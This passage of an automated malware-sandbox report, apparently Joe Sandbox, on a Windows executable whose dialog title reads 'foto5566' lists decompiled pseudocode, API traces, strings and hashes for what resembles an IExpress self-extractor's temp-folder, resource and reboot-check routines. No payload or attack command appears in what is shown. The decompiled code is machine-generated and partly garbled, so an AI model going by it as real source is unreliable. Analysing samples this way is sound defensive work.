0x0093576b
0x0093576b
0x00000000
0x00935747
0x00935747
0x0093574d
0x0093574f
0x00935771
0x00935771
0x00935773
0x00000000
0x00935751
0x00935751
0x00935753
0x00000000
0x00935755
0x0093575b
0x00935760
0x00935762
0x00000000
0x00935764
0x00935764
0x00935769
0x0093577e
0x0093577e
0x00935781
0x00935788
0x0093578d
0x0093578f
0x009357b2
0x009357b8
0x009357bd
0x009357bf
0x009357cd
0x009357cd
0x009357dd
0x009357e3
0x009357ef
0x009357f5
0x009357f8
0x0093580a
0x0093580a
0x009357fa
0x00935802
0x00935802
0x0093580d
0x0093580f
0x00935830
0x00935836
0x0093583d
0x0093584b
0x00935851
0x00935855
0x0093585a
0x0093585c
0x00000000
0x0093585e
0x0093585e
0x00000000
0x0093585e
0x00935811
0x00935817
0x00935819
0x0093581f
0x00000000
0x0093581f
0x00935791
0x00935797
0x0093579c
0x0093579e
0x00000000
0x009357a0
0x009357a9
0x009357ae
0x009357b0
0x00000000
0x00000000
0x00000000
0x00000000
0x009357b0
0x0093579e
0x00000000
0x00000000
0x00000000
0x00935769
0x00935762
0x00935753
0x0093574f
0x00000000
0x00000000
0x00000000
0x0093572e
0x00000000
0x00935864
0x00935864
0x00935864
0x00935717
0x00000000
0x009356c3
0x009356c5
0x009356c9
0x009356ce
0x009356d0
0x00000000
0x009356d6
0x009356d6
0x009356d8
0x009356dd
0x009356df
0x00000000
0x009356e1
0x009356e2
0x009356e4
0x009356e6
0x009356eb
0x009356ed
0x00000000
0x009356f3
0x009356f3
0x00000000
0x0093586c
0x00935878
0x0093587e
0x00935882
0x00935883
0x00935889
0x0093588e
0x0093588e
0x00000000
0x00935896
0x009356ed
0x009356df
0x009356d0
0x009356c1
0x009356a8
0x0093565b
0x0093565b
0x0093565d
0x00935669
0x00935669
0x0093565f
0x0093565f
0x00935665
0x00935667
0x00000000
0x00000000
0x00935667
0x0093566c
0x00935673
0x00935678
0x0093567a
0x0093589b
0x0093589b
0x00935680
0x00935685
0x0093568c
0x00000000
0x0093568c
0x0093567a
0x0093560e
0x00935613
0x0093561a
0x00935620
0x00935626
0x00000000
0x00935626
0x009355db
0x009355e0
0x009355e7
0x009355f1
0x009355f6
0x009355f6
0x009355f6
0x009358b7
0x009358c7

APIs

Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
Part of subcall function 0093468F: SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
Part of subcall function 0093468F: LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
Part of subcall function 0093468F: LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
Part of subcall function 0093468F: memcpy_s.MSVCRT ref: 009346E5
Part of subcall function 0093468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 009355CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00935638
LocalFree.KERNEL32(00000000), ref: 0093564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00935620

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Part of subcall function 00936285: GetLastError.KERNEL32(00935BBC), ref: 00936285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 009356B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0093571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00935737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 009357CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 009357EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00935802

Part of subcall function 00932630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00932654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00935830

Part of subcall function 00936517: FindResourceA.KERNEL32(00930000,000007D6,00000005), ref: 0093652A
Part of subcall function 00936517: LoadResource.KERNEL32(00930000,00000000,?,?,00932EE8,00000000,009319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00936538
Part of subcall function 00936517: DialogBoxIndirectParamA.USER32(00930000,00000000,00000547,009319E0,00000000), ref: 00936557
Part of subcall function 00936517: FreeResource.KERNEL32(00000000,?,?,00932EE8,00000000,009319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00936560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00935878

Part of subcall function 0093597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009359A8
Part of subcall function 0093597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 009359AF

Strings

msdownld.tmp, xrefs: 009357D3
A:\, xrefs: 009356F4
Z, xrefs: 0093570A
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009356AE, 009356B3, 0093583D
RUNPROGRAM, xrefs: 009355BD, 00935600
<None>, xrefs: 00935632

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-559629209
Opcode ID: 08c0022f343012a0009f5d2e0e0b43981c265e5480122e5331e502c2f480eb14
Instruction ID: 5e7fd8d0aa43188c8420c4fad2e404a3f771afce35225e4f33d756dbe2137f6b
Opcode Fuzzy Hash: 08c0022f343012a0009f5d2e0e0b43981c265e5480122e5331e502c2f480eb14
Instruction Fuzzy Hash: 32813C70A08A059BDB24AB748D85BFF73AD9FA9304F060065F5C6D21A1DFB48EC1CE51

Uniqueness

Uniqueness Score: -1.00%

Function 009353A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E009353A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x938004; // 0x911e09f9
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0093171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00931680(_t32, 0x104, _t20);
					E0093658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00936CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x938a20 = 1;
				goto L5;
			}

0x009353ac
0x009353b3
0x009353b9
0x009353bb
0x009353bd
0x009353bf
0x009353d1
0x009353d6
0x009353e0
0x009353e2
0x009353f5
0x009353fb
0x00935402
0x0093540b
0x00000000
0x00000000
0x00935413
0x00000000
0x00000000
0x00935415
0x00935416
0x00935427
0x0093542a
0x0093542b
0x00935434
0x00935434
0x0093543a
0x0093544c
0x0093544c
0x00935452
0x0093545a
0x00000000
0x00000000
0x0093545e
0x0093545f
0x00000000

APIs

Part of subcall function 0093171E: _vsnprintf.MSVCRT ref: 00931750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009353FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00935402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00935434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00935452

Strings

IXP%03d.TMP, xrefs: 009353C0
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009353B7, 009353E1, 0093541E
IXP, xrefs: 00935419

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2659685179
Opcode ID: c08879acb924a48caa8fcfdc855aa5c24f675ddb4d2ddedd49570cf34da92476
Instruction ID: d0e09ebae7308c9ee6c0772be6cc6d706296708937eac0bd263957a5359fdd95
Opcode Fuzzy Hash: c08879acb924a48caa8fcfdc855aa5c24f675ddb4d2ddedd49570cf34da92476
Instruction Fuzzy Hash: 9111237131860477D3289B369C4DFEF366DEFC6311F000025F686D22A0CE748D828EA2

Uniqueness

Uniqueness Score: -1.00%

Function 0093256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0093256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E009324E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00932572
0x00932573
0x00932575
0x00932578
0x0093257d
0x00932627
0x00932583
0x00932586
0x00932589
0x009325eb
0x00932607
0x00000000
0x00932609
0x0093261a
0x00000000
0x0093261a
0x00000000
0x0093258b
0x0093258b
0x0093259e
0x009325b2
0x009325ba
0x009325cb
0x009325d1
0x009325d6
0x009325da
0x009325dd
0x009325dd
0x009325e3
0x009325e3
0x009325e3
0x0093258b
0x00932589
0x0093262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00934096,00934096,?,00931ED3,00000001,00000000,?,?,00934137,?), ref: 009325B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00934096,?,00931ED3,00000001,00000000,?,?,00934137,?,00934096), ref: 009325CB
RegCloseKey.KERNELBASE(?,?,00931ED3,00000001,00000000,?,?,00934137,?,00934096), ref: 009325DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00934096,00934096,?,00931ED3,00000001,00000000,?,?,00934137,?), ref: 009325FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00934096,00000000,00000000,00000000,00000000,?,00931ED3,00000001,00000000), ref: 0093261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 009325A8
PendingFileRenameOperations, xrefs: 009325C3
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009325F5

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 3edb5987bcd3db329485ac25f86287babb57be1901651651135e62f4389f8bb7
Instruction ID: e7e53ad906201f1b0fb6e054282686c1ed6328624eb2b82d36ef64a3c412aa0b
Opcode Fuzzy Hash: 3edb5987bcd3db329485ac25f86287babb57be1901651651135e62f4389f8bb7
Instruction Fuzzy Hash: E1119E35916228BB9B24DB929C0EDFBBF7CEF527A5F104056F848E2010DA705F44EEA1

Uniqueness

Uniqueness Score: -1.00%

Function 00936A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00937155();
				_push(0x58);
				_push(0x9372b8);
				E00937208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x9388b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x9388b0; // 0x2
						if(__eflags != 0) {
							 *0x9381e4 = _t58;
							goto L13;
						} else {
							 *0x9388b0 = _t58;
							_t37 = E00936C3F(0x9310b8, 0x9310c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00936FF4();
						L13:
						_t68 =  *0x9388b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x9310b4);
							_push(0x9310ac);
							L00937202();
							 *0x9388b0 = 2;
						}
						if(_t53 == 0) {
							 *0x9388ac = 0;
						}
						_t71 =  *0x9388b4;
						if( *0x9388b4 != 0 && E00937060(_t71, 0x9388b4) != 0) {
							_t60 =  *0x9388b4; // 0x0
							 *0x93a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00932BFB(0x930000, 0, _t59); // executed
							 *0x9381e0 = _t30;
							__eflags =  *0x9381f8;
							if( *0x9381f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x9381e4;
							if( *0x9381e4 == 0) {
								__imp___cexit();
								_t30 =  *0x9381e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0093724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00936a60
0x00936a6a
0x00936a6c
0x00936a71
0x00936a78
0x00936a7f
0x00936a85
0x00936a8e
0x00936a91
0x00936a93
0x00936a9c
0x00936aa2
0x00000000
0x00000000
0x00936aa6
0x00936ab4
0x00000000
0x00936aa8
0x00936aaa
0x00936aab
0x00936aab
0x00936abf
0x00936abf
0x00936ac5
0x00936ad1
0x00936ad7
0x00936b05
0x00000000
0x00936ad9
0x00936ad9
0x00936ae9
0x00936af0
0x00936af2
0x00000000
0x00936af4
0x00936af4
0x00936afb
0x00936afb
0x00936af2
0x00936ac7
0x00936ac7
0x00936ac9
0x00936b0b
0x00936b0b
0x00936b11
0x00936b13
0x00936b18
0x00936b1d
0x00936b24
0x00936b24
0x00936b30
0x00936b39
0x00936b39
0x00936b3b
0x00936b42
0x00936b57
0x00936b5f
0x00936b65
0x00936b65
0x00936b67
0x00936b6c
0x00936b6e
0x00936b71
0x00936b74
0x00936b74
0x00936b79
0x00000000
0x00000000
0x00936b7d
0x00936b81
0x00000000
0x00000000
0x00936b83
0x00936b8c
0x00936b8d
0x00936b90
0x00936b90
0x00936b83
0x00936b81
0x00936b94
0x00936b98
0x00936ba2
0x00936b9a
0x00936b9a
0x00936b9a
0x00936ba3
0x00936bab
0x00936bb0
0x00936bb5
0x00936bbc
0x00936bbf
0x00000000
0x00936bbf
0x00936c1e
0x00936c25
0x00936c27
0x00936c2d
0x00936c2d
0x00936c32
0x00000000
0x00936bc5
0x00936bc5
0x00936bc8
0x00936bcc
0x00936bce
0x00936bce
0x00936bd1
0x00936bd3
0x00936bd3
0x00936bd6
0x00936bda
0x00936be1
0x00936be3
0x00936be5
0x00936be5
0x00936be6
0x00936be6
0x00936be9
0x00936bea
0x00936bea
0x00936b74
0x00936c39
0x00936c3e
0x00936c3e
0x00936abe
0x00936abe
0x00000000

APIs

Part of subcall function 00937155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00937182
Part of subcall function 00937155: GetCurrentProcessId.KERNEL32 ref: 00937191
Part of subcall function 00937155: GetCurrentThreadId.KERNEL32 ref: 0093719A
Part of subcall function 00937155: GetTickCount.KERNEL32 ref: 009371A3
Part of subcall function 00937155: QueryPerformanceCounter.KERNEL32(?), ref: 009371B8

GetStartupInfoW.KERNEL32(?,009372B8,00000058), ref: 00936A7F
Sleep.KERNEL32(000003E8), ref: 00936AB4
_amsg_exit.MSVCRT ref: 00936AC9
_initterm.MSVCRT ref: 00936B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00936B49
exit.KERNELBASE ref: 00936BBF
_ismbblead.MSVCRT ref: 00936BDA

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 4e86e6cff409e1cddb5841a55233dfb6c2a2c7927090d71ca48152eb07da69f1
Instruction ID: 82c96d911641793ee9642521024d5f0c56e0cf25d706e247540ca41baf0db6a8
Opcode Fuzzy Hash: 4e86e6cff409e1cddb5841a55233dfb6c2a2c7927090d71ca48152eb07da69f1
Instruction Fuzzy Hash: 7541D17195C324ABDB219FA8DC0576BB7F8EB84720F24801AF891E7290CB748D41AF91

Uniqueness

Uniqueness Score: -1.00%

Function 009358C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E009358C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00931680(_t20, _t36, _t33);
					E0093658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x939124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E009344B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x939124 = E00936285();
					_t14 = 0;
				}
				return _t14;
			}

0x009358cd
0x009358d1
0x009358d3
0x009358d5
0x009358d8
0x009358d8
0x009358da
0x009358db
0x009358e1
0x009358ed
0x009358f1
0x0093591e
0x0093592c
0x00935943
0x0093594a
0x0093594d
0x00935953
0x00935959
0x00000000
0x0093595b
0x0093595c
0x00935963
0x0093596c
0x00000000
0x00935972
0x00935974
0x0093597a
0x0093597a
0x0093596c
0x009358f3
0x00935901
0x00935906
0x0093590b
0x00935910
0x00935910
0x00935918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00935534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009358E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00935534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00935943
LocalFree.KERNEL32(00000000,?,00935534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093594D
CloseHandle.KERNEL32(00000000,?,00935534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0093595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00935534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00935963

Strings

TMP4351$.TMP, xrefs: 00935923
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009358CD, 009358CF, 00935919, 00935962

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-3104274291
Opcode ID: 1aa2c4db512995292b2590bfad36ad0b35e23f9f43ac2787fc2b8a91180d3e74
Instruction ID: 117208e68c3efd3ebe4012119ed6ab3e63a6b11dfb7444320f3a8d7627e7aae1
Opcode Fuzzy Hash: 1aa2c4db512995292b2590bfad36ad0b35e23f9f43ac2787fc2b8a91180d3e74
Instruction Fuzzy Hash: 451134316182107BC7245FB9AC4DB9B7E9DDF8A374F114A25F58AE31D1CAB09C059EA0

Uniqueness

Uniqueness Score: -1.00%

Function 009351E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E009351E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0093468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0093468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E009344B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x939124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x939124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E009344B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x939124 = 0x80070714;
					goto L10;
				}
				E009344B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x939124 = E00936285();
				goto L10;
			}

0x009351fb
0x00935207
0x0093520b
0x0093523c
0x00935268
0x00935270
0x0093528b
0x00935293
0x0093529c
0x009352a6
0x009352b0
0x00000000
0x009352b0
0x0093529e
0x00935279
0x00000000
0x0093527b
0x00935273
0x00000000
0x00935273
0x0093524a
0x00935250
0x00935256
0x00000000
0x00935256
0x00935219
0x00935223
0x00000000

APIs

Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
Part of subcall function 0093468F: SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
